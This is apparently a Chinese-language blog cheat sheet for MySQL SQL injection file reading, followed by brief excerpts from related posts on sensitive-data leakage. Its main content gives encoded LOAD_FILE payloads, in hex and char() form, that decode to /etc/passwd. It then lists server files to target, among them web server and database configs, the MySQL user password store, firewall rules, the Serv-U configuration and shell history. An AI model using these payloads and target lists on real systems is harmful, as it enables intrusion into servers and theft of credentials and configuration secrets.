load file 常用敏感資訊

2022-09-13 01:36:11 字數 4871 閱讀 3697

1、 replace(load_file(0×2f6574632f706173737764),0×3c,0×20)

2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

上面兩個是檢視乙個php檔案裡完全顯示**.有些時候不替換一些字元,如 「<」 替換成」空格」 返回的是網頁.而無法檢視到**.

3、 load_file(char(47)) 可以列出freebsd,sunos系統根目錄

4、/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 檢視linux apache虛擬主機配置檔案

5、c:\program files\apache group\apache\conf\httpd.conf 或c:\apache\conf\httpd.conf 檢視windows系統apache檔案

6、c:/resin-3.0.14/conf/resin.conf 檢視jsp開發的** resin檔案配置資訊.

7、c:/resin/conf/resin.conf /usr/local/resin/conf/resin.conf 檢視linux系統配置的jsp虛擬主機

10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路徑

11、 c:\windows\system32\inetsrv\metabase.xml 檢視iis的虛擬主機配置檔案

12、 /usr/local/resin-3.0.22/conf/resin.conf 針對3.0.22的resin配置檔案檢視

13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上

15、 /etc/sysconfig/iptables 本看防火牆策略

17 、/etc/my.cnf mysql的配置檔案

18、 /etc/redhat-release 紅帽子的系統版本

19 、c:\mysql\data\mysql\user.myd 存在mysql系統中的使用者密碼

20、/etc/sysconfig/network-scripts/ifcfg-eth0 檢視ip.

23、c:\program files\rhinosoft.com\serv-u\servudaemon.ini

24、c:\windows\my.ini

25、/etc/issue 顯示linux核心的發行版本資訊

26、/etc/ftpuser

27、檢視linux使用者下的操作記錄檔案.bash_history 或 .bash_profile

敏感資訊洩漏

漏洞成因 filename get filename echo echo file get contents filename header content type imgage jpeg header content disposition attachment filename filenam...

敏感資訊洩露

1 儲存 2 傳輸過程 http https 加密演算法如下 運維層面 日誌 備份檔案 配置檔案 應用層面 使用者資訊 通訊錄 郵箱 然後,攻擊者利用這個cookie 執行重放攻井接管使用者的會話從而訪問使用者的隱私資料。對於敏感資料,應當確保 1 當這些資料被長期儲存的時候,無論儲存在 它們是否都...

Pikachu 敏感資訊洩露

由於後台人員的疏忽或者不當的設計,導致不應該被前端使用者看到的資料被輕易的訪問到。比如 通過訪問url下的目錄,可以直接列出目錄下的檔案列表 輸入錯誤的url引數後報錯資訊裡面包含作業系統 中介軟體 開發語言的版本或其他資訊 前端的原始碼 html,css,js 裡面包含了敏感資訊,比如後台登入位址...